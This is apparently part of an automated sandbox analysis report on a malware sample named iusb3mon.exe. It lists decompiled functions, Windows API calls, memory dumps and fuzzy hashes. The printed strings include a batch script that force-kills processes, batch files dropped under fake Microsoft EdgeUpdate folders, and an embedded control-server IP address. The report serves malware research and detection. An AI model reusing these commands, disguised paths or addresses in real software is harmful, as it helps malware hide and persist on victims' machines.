                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00000080,00000000,00000004), ref: 06241832
                                                                                                                    • CancelIo.KERNEL32(?,?,?,?,0624560D), ref: 0624183B
                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 06241847
                                                                                                                    • closesocket.WS2_32(?), ref: 06241850
                                                                                                                    • SetEvent.KERNEL32(?,?,?,?,0624560D), ref: 06241859
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1486965892-0
                                                                                                                    • Opcode ID: a224462a5afa160f4ccafb917e0f886a97d46c70cc9673e4323a591c937074b8
                                                                                                                    • Instruction ID: d44b117bd72a88ea5e28e51f15ddc0c2a3a263870d2dc1e2c968054466503e60
                                                                                                                    • Opcode Fuzzy Hash: a224462a5afa160f4ccafb917e0f886a97d46c70cc9673e4323a591c937074b8
                                                                                                                    • Instruction Fuzzy Hash: 75F03A31000716BFDB309B95EC0EA9A7BB9FF04314F104568F3C2915E0DBB2AA449F50
                                                                                                                    Function 0625CAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 0625CACC
                                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0625CB7B
                                                                                                                    • LoadBitmapA.USER32(00000000,00007FE3), ref: 0625CB93
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2596413745-3916222277
                                                                                                                    • Opcode ID: 9d16b6da1874f56682fbc800bee5c391e144e54a44ae58127ab9f6756b9f29e0
                                                                                                                    • Instruction ID: d33b0670ec446b873721bbbc960179b2e4276da8090460476360c760278390ce
                                                                                                                    • Opcode Fuzzy Hash: 9d16b6da1874f56682fbc800bee5c391e144e54a44ae58127ab9f6756b9f29e0
                                                                                                                    • Instruction Fuzzy Hash: B2212871E10315AFEB20DB78DC88BAE7BB9EF40710F0601A9ED45EB281D6309644CB40
                                                                                                                    Function 001D1F90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 001D202F
                                                                                                                      • Part of subcall function 001D6F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,001D11FC,?,?,?,?,001D11FC,?,001FA814), ref: 001D6F94
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                    • API String ID: 3109751735-1866435925
                                                                                                                    • Opcode ID: 2d7ca2b5c3184245f7a8ce7f10918dc88ffa30592fd3a84899d1eb61ccb66e61
                                                                                                                    • Instruction ID: 811315f86cc310b97cf6b7bb812e90d9dee0a41a1f4203c8d7cf4d2b30e95304
                                                                                                                    • Opcode Fuzzy Hash: 2d7ca2b5c3184245f7a8ce7f10918dc88ffa30592fd3a84899d1eb61ccb66e61
                                                                                                                    • Instruction Fuzzy Hash: E411E4B29107087BC710DF68D802B96B3DCEF15310F54862BFA5897741EB70A944CBA1
                                                                                                                    Function 06244E65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56sleepfileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244E9D
                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 06244EE0
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 06244F0F
                                                                                                                      • Part of subcall function 06244D89: SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06244DBD
                                                                                                                      • Part of subcall function 06244D89: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06244E10
                                                                                                                      • Part of subcall function 06244D89: GetFileSize.KERNEL32(00000000,00000000), ref: 06244E21
                                                                                                                      • Part of subcall function 06244D89: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06244E3C
                                                                                                                      • Part of subcall function 06244D89: CloseHandle.KERNEL32(?), ref: 06244E59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
                                                                                                                    • String ID: .dat
                                                                                                                    • API String ID: 4140139616-100240174
                                                                                                                    • Opcode ID: 03d9576209ff81597c3111495a1288419b69b5773cecf4b47595c6dd6865e99b
                                                                                                                    • Instruction ID: eb0d5e97051a8e191afffd5a766e797f2117d7364e4b20d34f33ac24312c7d17
                                                                                                                    • Opcode Fuzzy Hash: 03d9576209ff81597c3111495a1288419b69b5773cecf4b47595c6dd6865e99b
                                                                                                                    • Instruction Fuzzy Hash: 8611C4B5E74345ABEBE4BF60EC88BE977ED9B54311F000089EAC596084D7B896C08F51
                                                                                                                    Function 06256228 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0625622D
                                                                                                                      • Part of subcall function 0624A00C: RaiseException.KERNEL32(06254592,00000000,?,0625F828,?,invalid string position,06254592,00000000,062617F8,?,invalid string position), ref: 0624A03A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionH_prologRaise
                                                                                                                    • String ID: ios::badbit set$ios::eofbit set$ios::failbit set
                                                                                                                    • API String ID: 3968804221-425934345
                                                                                                                    • Opcode ID: 00103c2846c36f81b656f3b09ef22f1f64221475e5d085a079a9afbec73c42cc
                                                                                                                    • Instruction ID: 2bea2cddf8fee6748496c8e0c613fd2e34d220932db3946250855b09cb1c67c2
                                                                                                                    • Opcode Fuzzy Hash: 00103c2846c36f81b656f3b09ef22f1f64221475e5d085a079a9afbec73c42cc
                                                                                                                    • Instruction Fuzzy Hash: F711C8B2C21149BECBE4FFA4DD91AEFB7789F14214F458019EC15A7641DA345904CB61
                                                                                                                    Function 0624ABCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(06246D67,202.79.169.178,0624ABA8,00000000,00000000,00000000,06246D67,00000000), ref: 0624ABE1
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0624ABE8
                                                                                                                    • ExitProcess.KERNEL32 ref: 0624AC69
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID: 202.79.169.178
                                                                                                                    • API String ID: 1703294689-4186200246
                                                                                                                    • Opcode ID: edb0ba4085b8038c32e7738f7b38eb0f22200d317372cfbd36e711b855f10da1
                                                                                                                    • Instruction ID: 3df239ef4aa92f3b25ce9a8bf085ae76b8e128612bb93dd5fa2bff5b2d71353a
                                                                                                                    • Opcode Fuzzy Hash: edb0ba4085b8038c32e7738f7b38eb0f22200d317372cfbd36e711b855f10da1
                                                                                                                    • Instruction Fuzzy Hash: 2301A1329A43029FDAE87B29F98DA5A7BD6AB50211B00401DFE9596188CB71A4C0DF55
                                                                                                                    Function 06244C6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C85
                                                                                                                    • WriteFile.KERNEL32(00000000,06265680,00001F53,?,00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C9D
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244CAA
                                                                                                                    Strings
                                                                                                                    • C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06244C75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                    • String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
                                                                                                                    • API String ID: 1065093856-3013772396
                                                                                                                    • Opcode ID: 97727581ee7dd769ed20260b16b3d5a6ab2fe7cd4577b9ca38891d1ac87e73c1
                                                                                                                    • Instruction ID: 010f1e4ad1a7d4973b54e47d9864edc9bc980cca420d232b3f70e64dc990b83a
                                                                                                                    • Opcode Fuzzy Hash: 97727581ee7dd769ed20260b16b3d5a6ab2fe7cd4577b9ca38891d1ac87e73c1
                                                                                                                    • Instruction Fuzzy Hash: 3CE012712513197EFA201E61BC8AFE77B5EEB057D8F014122FB44A5540C6615E458AB4
                                                                                                                    Function 062429CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,75920F00,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429E4
                                                                                                                    • WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 062429FC
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,06243E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06242A09
                                                                                                                    Strings
                                                                                                                    • @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill , xrefs: 062429F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                    • String ID: @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill
                                                                                                                    • API String ID: 1065093856-3151026013
                                                                                                                    • Opcode ID: 126465a4824e954719ed8ef77cb2fc3737326a483461916096ea20c9388e1d45
                                                                                                                    • Instruction ID: dc6197ae749e841adeb10c0cade3c10bcdb3fb112399e1e0c8737e42f32fbf91
                                                                                                                    • Opcode Fuzzy Hash: 126465a4824e954719ed8ef77cb2fc3737326a483461916096ea20c9388e1d45
                                                                                                                    • Instruction Fuzzy Hash: C3E0D8712413297FFA301E61BCCAFEB7B1DEB056D8F004121FB04D5540C6615E408BB1
                                                                                                                    Function 06245D5B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30processsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06244C6F: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C85
                                                                                                                      • Part of subcall function 06244C6F: WriteFile.KERNEL32(00000000,06265680,00001F53,?,00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244C9D
                                                                                                                      • Part of subcall function 06244C6F: CloseHandle.KERNEL32(00000000,?,?,06245D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06244CAA
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06245D7E
                                                                                                                    • Sleep.KERNEL32(000493E0), ref: 06245D8C
                                                                                                                    • WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06245DA2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Exec$AttributesCloseCreateHandleSleepWrite
                                                                                                                    • String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
                                                                                                                    • API String ID: 3627572907-3013772396
                                                                                                                    • Opcode ID: f4e597c37ce0826e9bd1ab9e2e35cd2694d4ae674e9967b9a496e4b12c3a878a
                                                                                                                    • Instruction ID: 283da7dfd1198277145da856f24f0b181d566ed82b25f550d91aaa86aae3e9c6
                                                                                                                    • Opcode Fuzzy Hash: f4e597c37ce0826e9bd1ab9e2e35cd2694d4ae674e9967b9a496e4b12c3a878a
                                                                                                                    • Instruction Fuzzy Hash: 55E04F20521B6876E0E57321AC89F9F354D8F83B44F060020FE64362D186992B5585FF
                                                                                                                    Function 0625B81C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0625B82D
                                                                                                                    • GetClassNameA.USER32(00000000,?,0000000A), ref: 0625B848
                                                                                                                    • lstrcmpiA.KERNEL32(?,combobox), ref: 0625B857
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassLongNameWindowlstrcmpi
                                                                                                                    • String ID: combobox
                                                                                                                    • API String ID: 2054663530-2240613097
                                                                                                                    • Opcode ID: 32ec0fb76aa5d824f43d66b8d6127562402fb60607c429d2b71cf52262ceed7f
                                                                                                                    • Instruction ID: 2a69b3c8cf11549354905f7fbe0a026dd5d9949ab0c8b67b558a72ac3d6ad412
                                                                                                                    • Opcode Fuzzy Hash: 32ec0fb76aa5d824f43d66b8d6127562402fb60607c429d2b71cf52262ceed7f
                                                                                                                    • Instruction Fuzzy Hash: 7CE06D31A6430ABBCF619F70DC4EAA93B68AB10386F118520FD56E5090D770D255CA92
                                                                                                                    Function 0624734F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25stringnetworkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,06247971,?,00000032,?,?,?,00000004), ref: 06247383
                                                                                                                    • gethostname.WS2_32(?,?), ref: 06247392
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadgethostnamelstrlen
                                                                                                                    • String ID: Console$Remarkbeizhu
